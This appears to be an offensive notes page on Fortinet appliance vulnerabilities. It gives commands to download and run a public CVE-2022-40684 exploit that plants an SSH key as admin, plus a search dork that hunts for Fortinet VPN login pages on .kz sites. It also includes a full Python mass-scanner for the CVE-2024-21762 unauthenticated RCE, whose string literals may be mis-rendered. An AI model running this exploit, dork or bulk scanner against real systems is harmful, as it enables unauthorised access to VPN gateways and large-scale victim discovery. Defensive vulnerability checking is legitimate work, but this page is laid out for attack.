CVE-2022-40684

POC for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances

wget https://raw.githubusercontent.com/horizon3ai/CVE-2022-40684/master/CVE-2022-40684.py; chmod +x CVE-2022-40684.py;

python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub

Dork

site:*.kz intext:"Please Login" inurl:"/remote/login"

CVE-2024-21762 (Unauth RCE)

python3 check-cve-2024-21762.py host_URL.txt
import socket
import ssl
import sys

context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# Certificate validation is disabled on purpose: appliances in the field
# commonly present self-signed or otherwise untrusted certificates and the
# probe would never get past the handshake otherwise. check_hostname must be
# cleared before verify_mode is set to CERT_NONE (the reverse order raises
# ValueError). Consequence for the operator: the script cannot tell a real
# appliance from an interposed host, so its verdict is only as trustworthy
# as the network path.
context.check_hostname=False
context.verify_mode=ssl.CERT_NONE

# should be fine for most hosts, increase this if you're getting errors.
# Seconds to wait on the socket. Note that this wait is also what decides the
# verdict: check() treats a read that times out as the "Vulnerable" signal,
# so a value that is too small for a slow link produces false positives.
TIMEOUT=5

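def send_req(host, req):
    """Open a TLS connection to *host*, send *req* and return the first reply.

    Args:
        host: ``(hostname, port)`` tuple as accepted by ``socket.create_connection``.
        req: Raw request bytes, sent once the TLS handshake has completed.

    Returns:
        -1 if the TCP connection or the TLS handshake fails (any ``OSError``,
        which covers ``ssl.SSLError`` and a timeout at that stage);
        0 if the request was sent but nothing arrived within ``TIMEOUT``;
        otherwise up to 2048 bytes of the server's reply (``b""`` if the
        peer closed the connection without answering).

    Both the plain and the TLS socket are closed on every return path.
    """
    try:
        raw = socket.create_connection(host, timeout=TIMEOUT)
    except OSError:
        return -1
    with raw:
        try:
            tls = context.wrap_socket(raw)
        except OSError:
            # A failed or timed-out handshake is "unreachable", not the
            # silent-server signal that check() interprets as vulnerable.
            return -1
        with tls:
            # sendall() retries partial writes; send() could leave part of the
            # request unsent on a slow link and skew the timing-based verdict.
            tls.sendall(req)
            try:
                return tls.recv(2048)
            except socket.timeout:
                return 0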

# Baseline request: a chunked POST terminated by a zero-length chunk. check()
# uses it only to confirm that the target answers at all and, via the 403
# test, that it looks like a Fortinet SSL VPN login interface. The ``{}`` in
# the Host header is filled with the base URL by check().
# NOTE(review): as rendered here the literals contain ``\\r`` (a backslash
# followed by "r"), not a carriage-return byte; confirm against the upstream
# script whether this is a display artefact before relying on the output.
control_req="""POST /remote/VULNCHECK HTTP/1.1\\r
Host: {}\\r
Transfer-Encoding: chunked\\r
\\r
0\\r
\\r
\\r
"""

# Probe request: the same POST with an over-long chunk-size line and no
# terminating chunk. check() reads nothing from the reply itself; the verdict
# is inferred solely from whether any reply arrives before TIMEOUT.
check_req="""POST /remote/VULNCHECK HTTP/1.1\\r
Host: {}\\r
Transfer-Encoding: chunked\\r
\\r
0000000000000000FF\\r
\\r
"""

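def check(host):
    """Probe one ``(hostname, port)`` and return a one-line verdict string.

    The baseline request is sent first: ``"Connection Failed"`` or
    ``"Control request failed"`` is returned if it does not complete, and a
    warning is printed when the reply is not the 403 that the SSL VPN
    endpoint answers with. The probe request is then sent and the verdict is
    inferred purely from timing: no reply within ``TIMEOUT`` -> Vulnerable,
    any reply -> Patched. A connection or handshake failure on the probe is
    reported as ``"Connection Failed"`` rather than being misread as Patched.

    Because the signal is a timeout, anything else that swallows the probe
    (a dropping middlebox, rate limiting, a slow link) also reads as
    Vulnerable; treat the result as an indicator to be confirmed against the
    appliance's firmware version, not as proof either way.

    Args:
        host: ``(hostname, port)`` tuple.

    Returns:
        A status string; the Vulnerable/Patched verdicts carry ANSI colour codes.
    """
    baseurl = "https://{}:{}".format(*host)

    r1 = send_req(host, control_req.format(baseurl).encode())
    if r1 == -1:
        return "Connection Failed"
    if r1 == 0:
        return "Control request failed"
    if b"HTTP/1.1 403 Forbidden" not in r1:
        print("\\033[1;33m[warning] Server does not look like a Fortinet SSL VPN interface\\033[0m")

    r2 = send_req(host, check_req.format(baseurl).encode())
    if r2 == -1:
        # The second connection never got past the handshake: no evidence
        # either way, so do not fall through to "Patched".
        return "Connection Failed"
    if r2 == 0:
        return "\\033[1;31mVulnerable\\033[0m"  # Red color for Vulnerable
    return "\\033[1;32mPatched\\033[0m"     # Green color for Patched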

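if __name__=="__main__":
    # Two modes: "<host> <port>" checks one target; "<file>" reads one
    # "host:port" per line (blank lines skipped) and checks each in turn.
    if len(sys.argv) == 3:
        try:
            host = (sys.argv[1], int(sys.argv[2]))
        except ValueError:
            sys.exit(f"Invalid port: {sys.argv[2]!r}")
        print(check(host))
    elif len(sys.argv) == 2:
        input_file = sys.argv[1]

        with open(input_file, 'r', encoding='utf-8') as file:
            host_urls = file.readlines()

        for url in host_urls:
            url = url.strip()
            if not url:
                continue

            # Split on the first colon, as the original did; a line without a
            # port or with a non-numeric port is reported and skipped instead
            # of aborting the whole run with a traceback.
            hostname, sep, port = url.partition(':')
            try:
                if not sep or not hostname:
                    raise ValueError("missing host or port")
                host = (hostname, int(port))
            except ValueError:
                print(f"Skipping {url!r}: expected host:port")
                continue

            # flush so the target name is visible while the (slow) probe runs.
            print(f"Scanning {url}...", end=' ', flush=True)
            result = check(host)
            print(result)
    else:
        print("Usage:")
        print("For single check: python3 script.py <host> <port>")
        print("For mass scanning: python3 script.py <host_URL.txt>")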